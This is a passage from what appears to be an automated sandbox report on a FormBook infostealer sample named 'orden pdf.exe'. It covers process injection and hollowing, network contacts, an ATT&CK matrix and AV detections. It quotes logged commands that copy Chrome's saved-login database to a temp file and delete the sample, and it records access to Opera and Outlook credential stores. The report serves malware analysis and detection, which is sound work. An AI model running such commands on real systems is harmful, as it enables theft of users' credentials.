          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0178C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0178C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01787D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01794D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01794D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01794D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01818DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01838D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0178746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01838CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_018214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0183740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0183740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0183740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0177EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0179E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01764F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01764F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0183070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0183070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01838F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0177766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0181FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_01838ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0176C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0181FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_3_00CE00AD mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_3_00CE00AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_3_00CE01CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: C:\Users\user\Desktop\orden pdf.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00198189 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00198189 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_013981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Benign windows process drops PE filesShow sources
          Source: C:\Windows\explorer.exeFile created: cx9l_rq2dula.exe.3.drJump to dropped file
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\orden pdf.exeSection loaded: unknown target: C:\Users\user\Desktop\orden pdf.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\orden pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\orden pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\orden pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\orden pdf.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\orden pdf.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\orden pdf.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: C90000
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AB106 LogonUserW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00173D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B411C SendInput,keybd_event,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B74BB mouse_event,
          Source: C:\Users\user\Desktop\orden pdf.exeProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: C:\Users\user\Desktop\orden pdf.exeProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
          Source: explorer.exe, 00000003.00000000.239214907.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: orden pdf.exe, explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: orden pdf.exe, 00000000.00000002.252510158.000000000021E000.00000002.00020000.sdmp, orden pdf.exe, 00000001.00000002.233175042.000000000021E000.00000002.00020000.sdmp, orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001965C4 cpuid
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001EB340 GetUserNameW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001A1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: orden pdf.exeBinary or memory string: WIN_81
          Source: orden pdf.exeBinary or memory string: WIN_XP
          Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
          Source: orden pdf.exeBinary or memory string: WIN_XPe
          Source: orden pdf.exeBinary or memory string: WIN_VISTA
          Source: orden pdf.exeBinary or memory string: WIN_7
          Source: orden pdf.exeBinary or memory string: WIN_8

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2Scripting11Startup Items1Startup Items1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information1Credential API Hooking1Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Valid Accounts2Application Shimming1Scripting11Input Capture31File and Directory Discovery3SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution1Registry Run Keys / Startup Folder2Valid Accounts2Obfuscated Files or Information3NTDSSystem Information Discovery117Distributed Component Object ModelCredential API Hooking1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptAccess Token Manipulation21Software Packing1LSA SecretsSecurity Software Discovery261SSHInput Capture31Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonProcess Injection512Rootkit1Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCClipboard Data2Exfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder2Masquerading2DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts2Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion3/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation21Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection512Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339334 Sample: orden pdf.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Multi AV Scanner detection for dropped file 2->72 74 8 other signatures 2->74 10 orden pdf.exe 4 2->10         started        process3 file4 54 C:\Users\user\...\DeviceCensus.exe.exe, PE32 10->54 dropped 56 C:\Users\user\AppData\Roaming\...\.url, MS 10->56 dropped 88 Maps a DLL or memory area into another process 10->88 14 orden pdf.exe 10->14         started        17 orden pdf.exe 10->17         started        signatures5 process6 signatures7 90 Modifies the context of a thread in another process (thread injection) 14->90 92 Maps a DLL or memory area into another process 14->92 94 Sample uses process hollowing technique 14->94 96 Queues an APC in another process (thread injection) 14->96 19 explorer.exe 1 6 14->19 injected process8 dnsIp9 58 www.hydrabadproperties.com 91.195.240.94, 49762, 49763, 49764 SEDO-ASDE Germany 19->58 60 unbelievabowboutique.com 34.102.136.180, 49745, 80 GOOGLEUS United States 19->60 62 5 other IPs or domains 19->62 46 C:\Users\user\AppData\...\cx9l_rq2dula.exe, PE32 19->46 dropped 48 C:\Program Files (x86)\...\cx9l_rq2dula.exe, PE32 19->48 dropped 76 System process connects to network (likely due to code injection or exploit) 19->76 78 Benign windows process drops PE files 19->78 24 systray.exe 1 18 19->24         started        28 wscript.exe 1 19->28         started        30 cx9l_rq2dula.exe 19->30         started        file10 signatures11 process12 file13 50 C:\Users\user\AppData\...\KN2logrv.ini, data 24->50 dropped 52 C:\Users\user\AppData\...\KN2logri.ini, data 24->52 dropped 80 Detected FormBook malware 24->80 82 Tries to steal Mail credentials (via file access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 86 3 other signatures 24->86 32 cmd.exe 2 24->32         started        36 cmd.exe 1 24->36         started        38 DeviceCensus.exe.exe 28->38         started        signatures14 process15 file16 44 C:\Users\user\AppData\Local\Temp\DB1, SQLite 32->44 dropped 64 Tries to harvest and steal browser information (history, passwords, etc) 32->64 40 conhost.exe 32->40         started        42 conhost.exe 36->42         started        66 Multi AV Scanner detection for dropped file 38->66 signatures17 process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          orden pdf.exe50%VirustotalBrowse
          orden pdf.exe33%ReversingLabsWin32.Trojan.Fuerboos

          Dropped Files

          SourceDetectionScannerLabelLink
